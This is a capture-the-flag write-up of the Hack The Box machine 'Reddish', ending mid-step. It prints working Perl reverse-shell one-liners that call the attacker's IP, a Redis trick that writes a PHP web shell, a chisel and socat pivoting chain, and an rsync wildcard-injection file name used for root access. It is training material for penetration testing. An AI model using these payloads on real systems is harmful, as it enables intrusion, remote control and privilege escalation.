Hack The Box | Reddish | Write Up

Públicado en por

Diving deep into the realms of ⚔️ HackTheBox 👽, I took on one of its most challenging monsters: Reddish! After a week of intense battles, deciphering and decoding, I can finally say: I conquered it! 💥. Not only was it an insane level machine that tested every bit of my knowledge and patience, but it also marked my initiation into the league of tackling such daunting challenges 🖥️.

Why did I pick this beast, you ask? Well, my aim was to enhance my pivoting 🦘 techniques and embrace the hardcore OSCP approach ☠️. hashtag#Reddish gave me the perfect playground to hone those skills ⭐.

Gear up, dive in, and let’s decode this journey together. 🛸 ¡¡¡Happy Hacking!!! 🛸

Like always let’s start with a NMAP scan:

sudo nmap -n -Pn -sS -p- --min-rate=5000 -vvv 10.10.10.94

We have found one port open:

PORT     STATE SERVICE      REASON
1880/tcp open  vsat-control syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
           Raw packets sent: 69697 (3.067MB) | Rcvd: 68911 (2.756MB)

Let’s run some NMAP script to check the service:

sudo nmap -n -Pn -sS -sVC -p 1880 --min-rate=5000 -vvv 10.10.10.94

We can see that the service run a Node.js Express Framework and it accept some HTTP-Methods (POST GET HEAD OPTIONS):

PORT     STATE SERVICE REASON         VERSION
1880/tcp open  http    syn-ack ttl 62 Node.js Express framework
| http-methods: 
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 818DD6AFD0D0F9433B21774F89665EEA
|_http-title: Error

Let’s check if we can reach this server through our navigator:

Let’s intercept this request and try to perform a POST request:

Untitled

Then we will receive a interesting reply that contain some information that looks we can format to access to another site:

Untitled

Let’s try to format our request to access to it:

http://10.10.10.94:1880/red/4db178d6acb2d603fb188eda5fb10ac1
Untitled

We have found “Node-RED” that is a tool to develop code with visuals methods. After some researching I have found this article POST and more that explain how to exploit it and get reverse shell. First of all we will need to perform this workflow:

  • Input – TCP:
Untitled
  • Advanced – exec:
Untitled
  • Output – TCP:
Untitled

In this point now we will start our listener server with netcat:

sudo nc -nlvp 4444

Let’s execute our workflow:

Untitled

Then we will receive our reverse shell but without all the functionalities:

Untitled

Now we can start to perform enumeration into this machine. After check some tools we can see that the machine doesn’t has the tipical tools but it has perl. Let’s check the interfaces:

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
11: eth0@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
17: eth1@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:04 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.4/16 brd 172.19.255.255 scope global eth1
       valid_lft forever preferred_lft forever

First, we can try to improve our shell with a reverse shell in perl:

perl -e 'use Socket;$i="10.10.16.15";$p=5000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

First we will need to start our second listener server:

sudo nc -nlvp 5000

Then we will receive our shell:

Untitled

Now we will improve our shell:

script /dev/null -c bash
"control+z"
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash

Once we have our shell we will start enumerate the server:

hostname -I

We will see that the server has two different IPs:

Untitled

Let’s check the ARP table:

cat /proc/net/arp

We will see probably two IPs that are the host:

Untitled

At this point we have discovered other network. Let’s check the active hosts in the network with this script. To do the transfer of this script we will use base64:

#KALI -> base64 -w0 enum.sh

#MACHINE -> echo "IyEgL3Vzci9iaW4vZW52IGJhc2gKIwojIEF1dGhvcjogQmVydCBWYW4gVnJlY2tlbSA8YmVydC52YW52cmVja2VtQGdtYWlsLmNvbT4KIwojIFBlcmZvcm0gYSBwaW5nIHN3ZWVwIG9uIHRoZSBzcGVjaWZpZWQgY2xhc3MgQyBuZXR3b3JrCgpzZXQgLW8gZXJyZXhpdCAjIGFib3J0IG9uIG5vbnplcm8gZXhpdHN0YXR1cwpzZXQgLW8gbm91bnNldCAjIGFib3J0IG9uIHVuYm91bmQgdmFyaWFibGUKCiN7e3sgRnVuY3Rpb25zCgp1c2FnZSgpIHsKY2F0IDw8IF9FT0ZfClVzYWdlOiAkezB9IE5FVFdPUksKCiAgTkVUV09SSyAgdGhlIG5ldHdvcmsgcGFydCBvZiBhIGNsYXNzIEMgSVAgYWRkcmVzcywgZS5nLiAxOTIuMTY4LjEKCl9FT0ZfCn0KCiMgVXNhZ2U6IGhvc3RfaXNfdXAgSVAKIyB3aXRoIElQIGEgKGZ1bGwpIElQIGFkZHJlc3MuIFJldHVybnMgZXhpdCBzdGF0dXMgMCBpZiB0aGUgc3BlY2lmaWVkIGhvc3QKIyByZXBsaWVzIHRvIHRoZSB0d2VldCwgYSBub256ZXJvIGV4aXQgc3RhdHVzIG90aGVyd2lzZS4KaG9zdF9pc191cCgpIHsKICAjIFNlbmQgb25lIHBpbmcgKC1jKSBhbmQgd2FpdCBhdCBtb3N0IDEgc2Vjb25kICgtdykKICBwaW5nIC1jIDEgLXcgMSAiJHtpcH0iID4gL2Rldi9udWxsIDI+JjEKfQoKI319fQoje3t7IENvbW1hbmQgbGluZSBwYXJzaW5nCgppZiBbICIkIyIgLW5lICIxIiBdOyB0aGVuCiAgICBlY2hvICJFeHBlY3RlZCAxIGFyZ3VtZW50LCBnb3QgJCMiID4mMgogICAgdXNhZ2UKICAgIGV4aXQgMgpmaQoKI319fQoje3t7IFZhcmlhYmxlcwoKbmV0d29yaz0iJHsxfSIKCiN9fX0KCiMgU2NyaXB0IHByb3BlcgoKZm9yIGhvc3QgaW4gJChzZXEgMSAyNTQpOyBkbwoKICBpcD0iJHtuZXR3b3JrfS4ke2hvc3R9IgoKICBpZiBob3N0X2lzX3VwICIke2lwfSI7IHRoZW4KICAgIGVjaG8gIiR7aXB9IgogIGZpCgpkb25lCg==" > enum.b64

#MACHINE -> base64 -d enum.b64 > enum.sh

#KALI -> md5sum enum.sh

#MACHINE -> md5sum enum.sh

Once we already have our script we can run it but we will run it with the new network that we have discovered:

root@nodered:/tmp# ./enum.sh 172.19.0

Once we have run the script we will see that we have discovered 3 more assets:

Untitled

Let’s check the other network:

root@nodered:/tmp# ./enum.sh 172.18.0

And we will see the address that we already know:

Untitled

Now we will check the open ports of these new IPs with this script. We will use the same technique did it before to transfer it to the machine:

root@nodered:/tmp# ./portScan.sh -i 172.19.0.2 -p 10000

After execute the script we will discover some open ports (80 and 6379):

# ./portScan.sh -i 172.19.0.2 -p 10000
172.19.0.2:6379 is open
# ./portScan.sh -i 172.19.0.3 -p 10000
172.19.0.3:80 is open

At this point we have some open ports in other network that means we should perform pivoting to reach the others servers. To do that we will use “chisel”. To compile chisel we will need the version 17.7 of go and we can use this guide to install it:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ git clone https://github.com/jpillora/chisel.git

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ cd chisel

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ go build .

┌──(david㉿hsbox)-[~/hackTheBox/reddish/chisel]
└─$ go build -ldflags "-s -w" .

┌──(david㉿hsbox)-[~/hackTheBox/reddish/chisel]
└─$ upx chisel
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   8134656 ->   3137844   38.57%   linux/amd64   chisel                        

Packed 1 file.

To download the file we will use a bash function. We can find it here. Just copy it into our shell:

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnrn" >&3
  (while read line; do
   [[ "$line" ==
Untitled

Now we can turn on our provisional web server:

python -m http.server  8888

Once we have our web server we can execute the function:

root@nodered:/tmp# __curl http://10.10.16.15:8888/chisel > chisel

Just to be sure we can check with md5sum if we have downloaded correctly the binary:

┌──(david㉿hsbox)-[~/hackTheBox/reddish/chisel]
└─$ md5sum chisel         
cac0ab6d8fcea44b130a7c2733e1c1c9  chisel

root@nodered:/tmp# md5sum chisel
md5sum chisel
cac0ab6d8fcea44b130a7c2733e1c1c9  chisel

Now we have our chisel binary into the machine. We need to reach the server 172.19.0.3:80 from our Kali Linux. To start we need a chisel server into our Kali Linux to receive the connection from the server that we have access:

┌──(david㉿hsbox)-[~/hackTheBox/reddish/chisel]
└─$ ./chisel server --reverse -p 5001    
2023/10/18 13:53:05 server: Reverse tunnelling enabled
2023/10/18 13:53:05 server: Fingerprint 9iN/TBkDUZ31yUlBP1CRPbXvY4FJSP2EN/NOvSTUIZM=
2023/10/18 13:53:05 server: Listening on http://0.0.0.0:5001
Untitled

After execute our chisel server we need to execute the client into the machine we have access to get communication with the other server through the server that we already have access from our Kali Linux:

root@nodered:/tmp# ./chisel client 10.10.16.15:5001 R:80:172.19.0.3:80 &
./chisel client 10.10.16.15:5001 R:80:172.19.0.3:80 &
[1] 18237
023/10/18 11:55:56 client: Connecting to ws://10.10.16.15:5001
2023/10/18 11:55:57 client: Connected (Latency 27.687025ms)
Untitled

Now we should have access to the server 172.19.0.3 to the web server through our machine passing through the machine that we had access:

Untitled

If we check the code we will see that exist some interesting comments and a javascript function that count how much time we tried to access to the web page:

Untitled

Also if we inspect the code we can see that the number of hits increment each time:

Untitled

If we check the function “backupDatabase” we will see a new directory “8924d0549008565c554f8128cd11fda4/ajax.php?backup=...” but we don’t have access:

Untitled

We don’t have more information about the server so let’s look the other server to check the port “6379”. To do that we will need to create other tunnel to reach the server from our Kali Linux through the server that we have access:

./chisel client 10.10.16.15:5001 R:6379:172.19.0.2:6379 &
Untitled

Now we have access to the IPs 172.19.0.3:80 and 172.19.0.2:6379 from our machine:

Untitled

After communicate our machine we can perform a NMAP scan over the port:

sudo nmap -n -Pn -sV -p 6379 127.0.0.1

We will discover a new service called “Redis 4.0.9”:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ sudo nmap -n -Pn -sV -p 6379 127.0.0.1
[sudo] password for david: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-18 14:27 CEST
Nmap scan report for 127.0.0.1
Host is up (0.000052s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.93 seconds
Untitled

After check some links I have found this guide to know how to exploit this service in HackTricks. Let’s do some enumeration over the service:

  • Enumerate databases:
COMMAND: INFO keyspace
$44
# Keyspace
db0:keys=1,expires=0,avg_ttl=0
  • Choose the database:
COMMAND: SELECT 0
+OK
  • Check the keys of the database:
COMMAND: KEYS *
*1
$4
hits
  • Check the value of the key:
COMMAND: GET hits
$1
2

The value of the key hits is “2” we can say that the database is the web server database running in the server “172.19.0.3”. I would say that they are connected. If we check Hack Tricks we can see that we have an option to upload a web shell through the service:

Untitled

But we will need a static directory and if you remember we had discovered one:

Untitled

I would say that the default route is “/var/www/html” so let’s replicate the steps from Hack Tricks to see if we can obtain a PHP web shell:

┌──(david㉿hsbox)-[~]
└─$ sudo apt -y install redis-tools

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ sudo redis-cli -h 127.0.0.1 flushall

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ sudo redis-cli -h 127.0.0.1
127.0.0.1:6379> config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
OK
127.0.0.1:6379> config set dbfilename wshell.php
OK
127.0.0.1:6379> set test "<?php system($_REQUEST['cmd']); ?>"
OK
127.0.0.1:6379> save
OK
(0.56s)
127.0.0.1:6379>

Now we can check if we have access to our web shell:

http://localhost/8924d0549008565c554f8128cd11fda4/wshell.php?cmd=id
Untitled

I have noticed that the system has some kind of script that delete the files so we can make a little script to upload again our php shell:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ cat uploadShell.sh 
#!/bin/bash

redis-cli -h 127.0.0.1 config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
redis-cli -h 127.0.0.1 config set dbfilename wshell.php
redis-cli -h 127.0.0.1 set test "<?php system($_REQUEST['cmd']); ?>"
redis-cli -h 127.0.0.1 save

Let’s keep doing enumeration:

http://localhost/8924d0549008565c554f8128cd11fda4/wshell.php?cmd=hostname%20-I

We will discover a new network segment:

Untitled

In this point we need to improve our shell into the machine “172.19.0.2” that’s means we will need to get a reverse shell but now we are working through the server “nodered:172.19.0.4” so we will need use the tool “Socat” that allow us to redirect the reverse shell from the “nodered” host that receive the reverse shell from the machine “172.19.0.3” to our Kali Linux. To do that first of all we will need to transfer the socat binary to the machine “nodered” and we will use the web server we already have. We can download it with the next perl command:

perl -e 'use File::Fetch;$url = "http://10.10.16.15:8888/socat";$ff = File::Fetch->new(uri => $url);$file = $ff->fetch() or die $ff->error;'

Give to it execution permission:

root@nodered:/tmp# chmod +x socat

Now we will prepare our listener server to receive the reverse shell from “172.19.0.3” through “nodered” to our Kali Linux

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ sudo nc -nlvp 5002         
[sudo] password for david: 
listening on [any] 5002 ...

Once we have our listener in the “nodered” machine we will forward the reverse shell with next socat command:

root@nodered:/tmp# ./socat TCP-LISTEN:6000,fork TCP:10.10.16.15:5002 &
Untitled

Upload again the web shell with our script:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ ./uploadShell.sh                 
OK
OK
OK
OK

And now we will execute this payload into our web shell to get our reverse shell:

  • Original
perl -e 'use Socket;$i="172.19.0.4";$p=6000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • URL encoded:
perl%20-e%20%27use%20Socket%3B%24i%3D%22172.19.0.4%22%3B%24p%3D6000%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

In the end we should have something like this:

http://localhost/8924d0549008565c554f8128cd11fda4/wshell.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22172.19.0.4%22%3B%24p%3D6000%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

Then we will receive our reverse shell from the server “172.19.0.3”:

Untitled

Before start to enumerate the server let’s improve our shell. Once we have our shell we can check the home directory and we will see that we can’t access any home directory:

Untitled

If we keep doing enumeration we will see the “backup” directory and it is very interesting:

Untitled

We have found a backup script:

Untitled

This script does a backup of the files “.rdb” into the directory “/var/www/html/f187a0ec71ce99642e4f0afbd441a68b” and it is synchronizing with the host “backup:837” that means probable we have discovered another server but let’s check if we can perform privilege escalation through the rsync binary: GFTBins. We have found how to perform a privilege escalation with rsync. First of all we will execute another socat tunnel to receive the root reverse shell in our kali linux:

root@nodered:/tmp# ./socat TCP-LISTEN:6001,fork TCP:10.10.16.15:5003 &
Untitled

Now we will create the file “perlRev.rdb” with the reverse shell code:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ cat perlRev.rdb                         
perl -e 'use Socket;$i="172.19.0.4";$p=6001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We can transfer the file with base64:

#KALI -> base64 -w0 perlRev.rdb

#MACHINE -> echo "cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTcyLjE5LjAuNCI7JHA9NjAwMTtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsnCg==" > perlRev.b64

#MACHINE -> base64 -d perlRev.b64 > perlRev.rdb

Now with all the resources prepared we can perform our privilege escalation. Move the file “perlRev.rdb” and create the file to execute it:

cp perlRev.rdb /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/

touch /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh perlRev.rdb

Now when the script with rsync run we will receive our reverse shell with root rights because the script use wildcard to process the files and then the script with root privileges will execute “sh perlRev.rdb” with our reverse shell inside:

Untitled

Also we will have access to the user flag:

# cd /home
# ls
bergamotto
lost+found
somaro
# cd somaro
# cat user.txt
63c2273dfe30adfb8f0b5418d4c30b3f
Untitled

Well we need to keep enumerating the network to check how we can reach the root flag here. Let’s start to see if we have more server in the same network but first we need to transfer our scripts:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ base64 -w0 pingScan.sh                                     
IyEgL3Vzci9iaW4vZW52IGJhc2gKIwojIEF1dGhvcjogQmVydCBWYW4gVnJlY2tlbSA8YmVydC52YW52cmVja2VtQGdtYWlsLmNvbT4KIwojIFBlcmZvcm0gYSBwaW5nIHN3ZWVwIG9uIHRoZSBzcGVjaWZpZWQgY2xhc3MgQyBuZXR3b3JrCgpzZXQgLW8gZXJyZXhpdCAjIGFib3J0IG9uIG5vbnplcm8gZXhpdHN0YXR1cwpzZXQgLW8gbm91bnNldCAjIGFib3J0IG9uIHVuYm91bmQgdmFyaWFibGUKCiN7e3sgRnVuY3Rpb25zCgp1c2FnZSgpIHsKY2F0IDw8IF9FT0ZfClVzYWdlOiAkezB9IE5FVFdPUksKCiAgTkVUV09SSyAgdGhlIG5ldHdvcmsgcGFydCBvZiBhIGNsYXNzIEMgSVAgYWRkcmVzcywgZS5nLiAxOTIuMTY4LjEKCl9FT0ZfCn0KCiMgVXNhZ2U6IGhvc3RfaXNfdXAgSVAKIyB3aXRoIElQIGEgKGZ1bGwpIElQIGFkZHJlc3MuIFJldHVybnMgZXhpdCBzdGF0dXMgMCBpZiB0aGUgc3BlY2lmaWVkIGhvc3QKIyByZXBsaWVzIHRvIHRoZSB0d2VldCwgYSBub256ZXJvIGV4aXQgc3RhdHVzIG90aGVyd2lzZS4KaG9zdF9pc191cCgpIHsKICAjIFNlbmQgb25lIHBpbmcgKC1jKSBhbmQgd2FpdCBhdCBtb3N0IDEgc2Vjb25kICgtdykKICBwaW5nIC1jIDEgLXcgMSAiJHtpcH0iID4gL2Rldi9udWxsIDI+JjEKfQoKI319fQoje3t7IENvbW1hbmQgbGluZSBwYXJzaW5nCgppZiBbICIkIyIgLW5lICIxIiBdOyB0aGVuCiAgICBlY2hvICJFeHBlY3RlZCAxIGFyZ3VtZW50LCBnb3QgJCMiID4mMgogICAgdXNhZ2UKICAgIGV4aXQgMgpmaQoKI319fQoje3t7IFZhcmlhYmxlcwoKbmV0d29yaz0iJHsxfSIKCiN9fX0KCiMgU2NyaXB0IHByb3BlcgoKZm9yIGhvc3QgaW4gJChzZXEgMSAyNTQpOyBkbwoKICBpcD0iJHtuZXR3b3JrfS4ke2hvc3R9IgoKICBpZiBob3N0X2lzX3VwICIke2lwfSI7IHRoZW4KICAgIGVjaG8gIiR7aXB9IgogIGZpCgpkb25lCg==                                                                                                                                                                      

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ base64 -w0 portScan.sh 
IyEvYmluL2Jhc2gKI1ZhcmlhYmxlcwplbXB0eT0iIgojQXJndW1lbnRzIGZvciB0aGUgc2NyaXB0CndoaWxlIFsgIiQxIiAhPSAiIiBdOyBkbwoJY2FzZSAiJDEiIGluCgkJLWkgfCAtLWlwICkJCWlwPSIkMiI7CXNoaWZ0OzsKCQktcCB8IC0tcG9ydHMgKQkJcG9ydHM9IiQyIjsJc2hpZnQ7OwoJZXNhYwoJc2hpZnQKZG9uZQojQ2hlY2tpbmcgaWYgdGhlIC1pIGlzIGVtcHR5CmlmIFtbICRpcCA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IGFuIElQIGFkZHJlc3Mgd2l0aCAtaSIKCWV4aXQKZmkKI2NoZWNraW5nIGlzIC1wIGlzIGVtcHR5CmlmIFtbICRwb3J0cyA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IHRoZSBtYXggcG9ydCByYW5nZSAtcCIKCWV4aXQKZmkKI1NjYW5zIHBvcnRzL0R1bXBzIGNsb3NlZCBwb3J0cy9kaXNwbGF5cyBvcGVuIHBvcnRzCmZvciBpIGluICQoc2VxIDEgJHBvcnRzKTsgZG8KCSggZWNobyA+IC9kZXYvdGNwLyRpcC8kaSkgPiAvZGV2L251bGwgMj4mMSAmJiBlY2hvICRpcCI6IiRpICJpcyBvcGVuIjsKZG9uZQo=

# echo "IyEgL3Vzci9iaW4vZW52IGJhc2gKIwojIEF1dGhvcjogQmVydCBWYW4gVnJlY2tlbSA8YmVydC52YW52cmVja2VtQGdtYWlsLmNvbT4KIwojIFBlcmZvcm0gYSBwaW5nIHN3ZWVwIG9uIHRoZSBzcGVjaWZpZWQgY2xhc3MgQyBuZXR3b3JrCgpzZXQgLW8gZXJyZXhpdCAjIGFib3J0IG9uIG5vbnplcm8gZXhpdHN0YXR1cwpzZXQgLW8gbm91bnNldCAjIGFib3J0IG9uIHVuYm91bmQgdmFyaWFibGUKCiN7e3sgRnVuY3Rpb25zCgp1c2FnZSgpIHsKY2F0IDw8IF9FT0ZfClVzYWdlOiAkezB9IE5FVFdPUksKCiAgTkVUV09SSyAgdGhlIG5ldHdvcmsgcGFydCBvZiBhIGNsYXNzIEMgSVAgYWRkcmVzcywgZS5nLiAxOTIuMTY4LjEKCl9FT0ZfCn0KCiMgVXNhZ2U6IGhvc3RfaXNfdXAgSVAKIyB3aXRoIElQIGEgKGZ1bGwpIElQIGFkZHJlc3MuIFJldHVybnMgZXhpdCBzdGF0dXMgMCBpZiB0aGUgc3BlY2lmaWVkIGhvc3QKIyByZXBsaWVzIHRvIHRoZSB0d2VldCwgYSBub256ZXJvIGV4aXQgc3RhdHVzIG90aGVyd2lzZS4KaG9zdF9pc191cCgpIHsKICAjIFNlbmQgb25lIHBpbmcgKC1jKSBhbmQgd2FpdCBhdCBtb3N0IDEgc2Vjb25kICgtdykKICBwaW5nIC1jIDEgLXcgMSAiJHtpcH0iID4gL2Rldi9udWxsIDI+JjEKfQoKI319fQoje3t7IENvbW1hbmQgbGluZSBwYXJzaW5nCgppZiBbICIkIyIgLW5lICIxIiBdOyB0aGVuCiAgICBlY2hvICJFeHBlY3RlZCAxIGFyZ3VtZW50LCBnb3QgJCMiID4mMgogICAgdXNhZ2UKICAgIGV4aXQgMgpmaQoKI319fQoje3t7IFZhcmlhYmxlcwoKbmV0d29yaz0iJHsxfSIKCiN9fX0KCiMgU2NyaXB0IHByb3BlcgoKZm9yIGhvc3QgaW4gJChzZXEgMSAyNTQpOyBkbwoKICBpcD0iJHtuZXR3b3JrfS4ke2hvc3R9IgoKICBpZiBob3N0X2lzX3VwICIke2lwfSI7IHRoZW4KICAgIGVjaG8gIiR7aXB9IgogIGZpCgpkb25lCg==" > pingScan.b64

# echo "IyEvYmluL2Jhc2gKI1ZhcmlhYmxlcwplbXB0eT0iIgojQXJndW1lbnRzIGZvciB0aGUgc2NyaXB0CndoaWxlIFsgIiQxIiAhPSAiIiBdOyBkbwoJY2FzZSAiJDEiIGluCgkJLWkgfCAtLWlwICkJCWlwPSIkMiI7CXNoaWZ0OzsKCQktcCB8IC0tcG9ydHMgKQkJcG9ydHM9IiQyIjsJc2hpZnQ7OwoJZXNhYwoJc2hpZnQKZG9uZQojQ2hlY2tpbmcgaWYgdGhlIC1pIGlzIGVtcHR5CmlmIFtbICRpcCA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IGFuIElQIGFkZHJlc3Mgd2l0aCAtaSIKCWV4aXQKZmkKI2NoZWNraW5nIGlzIC1wIGlzIGVtcHR5CmlmIFtbICRwb3J0cyA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IHRoZSBtYXggcG9ydCByYW5nZSAtcCIKCWV4aXQKZmkKI1NjYW5zIHBvcnRzL0R1bXBzIGNsb3NlZCBwb3J0cy9kaXNwbGF5cyBvcGVuIHBvcnRzCmZvciBpIGluICQoc2VxIDEgJHBvcnRzKTsgZG8KCSggZWNobyA+IC9kZXYvdGNwLyRpcC8kaSkgPiAvZGV2L251bGwgMj4mMSAmJiBlY2hvICRpcCI6IiRpICJpcyBvcGVuIjsKZG9uZQo=" > portScan.b64

# base64 -d pingScan.b64 > pingScan.sh

# base64 -d portScan.b64 > portScan.sh

Now we can execute both of them:

  • Ping Scan:
# ./pingScan.sh 172.20.0
172.20.0.1
172.20.0.2
172.20.0.3
  • Port Scan:
# ./portScan.sh -i 172.20.0.2 -p 10000
172.20.0.2:873 is open

Looks like we have found the server that save the backups with the script we have found too. Let’s check if we can access to the server with rsync now that we are root:

# rsync rsync://backup:873    
src             src path
# rsync rsync://backup:873/src
drwxr-xr-x          4,096 2018/07/15 17:42:39 .
-rwxr-xr-x              0 2018/05/04 21:01:30 .dockerenv
-rwxr-xr-x            100 2018/05/04 19:55:07 docker-entrypoint.sh
drwxr-xr-x          4,096 2018/07/15 17:42:41 backup
drwxr-xr-x          4,096 2018/07/15 17:42:39 bin
drwxr-xr-x          4,096 2018/07/15 17:42:38 boot
drwxr-xr-x          4,096 2018/07/15 17:42:39 data
drwxr-xr-x          3,640 2023/10/18 19:45:50 dev
drwxr-xr-x          4,096 2023/10/18 23:51:31 etc
drwxr-xr-x          4,096 2018/07/15 17:42:38 home
drwxr-xr-x          4,096 2018/07/15 17:42:39 lib
drwxr-xr-x          4,096 2018/07/15 17:42:38 lib64
drwxr-xr-x          4,096 2018/07/15 17:42:38 media
drwxr-xr-x          4,096 2023/10/18 23:54:57 mnt
drwxr-xr-x          4,096 2018/07/15 17:42:38 opt
dr-xr-xr-x              0 2023/10/18 19:45:50 proc
drwxr-xr-x          4,096 2023/10/18 22:28:01 rdb
drwx------          4,096 2023/10/19 11:25:42 root
drwxr-xr-x          4,096 2023/10/18 23:55:10 run
drwxr-xr-x          4,096 2018/07/15 17:42:38 sbin
drwxr-xr-x          4,096 2018/07/15 17:42:38 srv
dr-xr-xr-x              0 2023/10/19 15:30:41 sys
drwxrwxrwt          4,096 2023/10/19 16:32:01 tmp
drwxr-xr-x          4,096 2018/07/15 17:42:39 usr
drwxr-xr-x          4,096 2018/07/15 17:42:39 var

We can see that we have complete access to the system file. Let’s try to get some reverse shell through a cron task but first we will need to have socat in the machine “172.20.0.3” to redirect the reverse shell to nodered and from there to our kali linux. to do that we will use the tool “xclip” to copy the base64 output:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ base64 -w0 socat | xclip -sel clip

# echo pastebase64code | base64 -d > socat

Now we have socat:

Untitled

So we can start to execute the redirections with socat (172.19.0.3/172.20.0.2):

# ./socat TCP-LISTEN:7000,fork TCP:172.19.0.4:6002 &

Now we will create in nodered the redirection to reach our Kali Linux:

# ./socat TCP-LISTEN:6002,fork TCP:10.10.16.15:5004 &
Untitled

Finally, we need to create our listener server to receive the reverse shell:

┌──(david㉿hsbox)-[~/hackTheBox/reddish]
└─$ sudo nc -nlvp 5004       
[sudo] password for david: 
listening on [any] 5004 ...

Once we have our redirections already established we can try to transfer the malicious cron job with our reverse shell:

  • Create our reverse shell file “shell.sh” whit this content:
perl -e 'use Socket;$i="172.20.0.3";$p=7000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Transfer the file to the “172.20.0.3” server:
